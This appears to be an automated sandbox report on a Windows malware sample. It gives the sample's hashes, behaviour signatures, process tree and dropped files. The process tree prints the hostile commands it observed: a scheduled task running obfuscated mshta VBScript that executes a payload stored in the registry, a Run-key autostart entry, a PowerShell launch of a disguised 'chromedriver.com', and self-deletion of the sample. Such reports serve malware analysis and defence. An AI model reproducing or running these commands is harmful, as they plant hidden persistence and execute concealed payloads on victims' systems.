Analysis
-
max time kernel
62s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 14:38
Static task
static1
Behavioral task
behavioral1
Sample
d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe
Resource
win10v2004-20230220-en
General
-
Target
d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe
-
Size
2.0MB
-
MD5
c67902b44f30fa677c5720612e25075a
-
SHA1
672720055d4e2923129b744658d66a49a78ac76c
-
SHA256
d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d
-
SHA512
ea1eea9caed3ece30dc46493a4101f08161a6d2d496bd6229fdd169c1e2a284121b88dbbb4ea8991ee0520cbe1d26bfa9f1b13f5d989daa0ff7f358c5dc83445
-
SSDEEP
49152:Pw80cTsjkWakLHZavDbq2BcdEDmYX0GpMkTuFHX9:o8sjkU5aDmdng5pMXX
Malware Config
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\chromedriver = "C:\\ProgramData\\Services\\chromedriver.com \"C:\\ProgramData\\Services\\chromedriver\"" d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe -
Executes dropped EXE 1 IoCs
pid Process 1536 chromedriver.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1420 powershell.exe 1420 powershell.exe 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com 1536 chromedriver.com -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1536 chromedriver.com -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1420 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1736 wrote to memory of 3780 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 87 PID 1736 wrote to memory of 3780 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 87 PID 1736 wrote to memory of 3780 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 87 PID 1736 wrote to memory of 4460 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 88 PID 1736 wrote to memory of 4460 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 88 PID 1736 wrote to memory of 4460 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 88 PID 4460 wrote to memory of 1420 4460 cmd.exe 90 PID 4460 wrote to memory of 1420 4460 cmd.exe 90 PID 4460 wrote to memory of 1420 4460 cmd.exe 90 PID 1420 wrote to memory of 1536 1420 powershell.exe 99 PID 1420 wrote to memory of 1536 1420 powershell.exe 99 PID 1420 wrote to memory of 1536 1420 powershell.exe 99 PID 1736 wrote to memory of 4412 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 100 PID 1736 wrote to memory of 4412 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 100 PID 1736 wrote to memory of 4412 1736 d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe 100 PID 1536 wrote to memory of 3916 1536 chromedriver.com 102 PID 1536 wrote to memory of 3916 1536 chromedriver.com 102 PID 1536 wrote to memory of 3916 1536 chromedriver.com 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe"C:\Users\Admin\AppData\Local\Temp\d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe"1⤵
- Adds policy Run key to start application
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn chromedriver /tr "\"mshta.exe\" vbscript:execute("\"Set\"&chr(32)&\"a=CreateObject(\"\"WScript.Shell\"\"):b=\"\"HKEY_CURRENT_USER\Software\config\resync\"\":body=a.RegRead(b):ReturnCode=a.Run(body,0,True)\")(window.close) /sc minute /mo 30 /RL highest /f2⤵
- Creates scheduled task(s)
PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C cd %ProgramData%\Services && PowerShell.exe Start-Process chromedriver.com "chromedriver" && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell.exe Start-Process chromedriver.com "chromedriver"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\ProgramData\Services\chromedriver.com"C:\ProgramData\Services\chromedriver.com" chromedriver4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Query /TN TDUDLL5⤵PID:3916
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q "C:\Users\Admin\AppData\Local\Temp\d69131505014911dea45767a130e9ed4672a2d3fa1dae2f2ce4bcdea0ade093d.exe"2⤵PID:4412
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
758KB
MD5769d004d1bd3fbd5d081a74210e01ff5
SHA1b2f933d8763de04510e77e76ff9ffe8f3063b33c
SHA2560bf019379bce4ecb79a602ec15c8f371d13b4103d7d614b1da807ec67d348eff
SHA5123229a674e5f4b0086ef0b6bba9945d1a73a1c6e2b11373dab44b2cf1162b57691a6a9d4ab5068f3dc6660727b23b1e75f449c8258fa797606c016d986dd9ad0f
-
Filesize
732KB
MD571d8f6d5dc35517275bc38ebcc815f9f
SHA1cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA5124826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59
-
Filesize
732KB
MD571d8f6d5dc35517275bc38ebcc815f9f
SHA1cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA5124826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
758KB
MD5769d004d1bd3fbd5d081a74210e01ff5
SHA1b2f933d8763de04510e77e76ff9ffe8f3063b33c
SHA2560bf019379bce4ecb79a602ec15c8f371d13b4103d7d614b1da807ec67d348eff
SHA5123229a674e5f4b0086ef0b6bba9945d1a73a1c6e2b11373dab44b2cf1162b57691a6a9d4ab5068f3dc6660727b23b1e75f449c8258fa797606c016d986dd9ad0f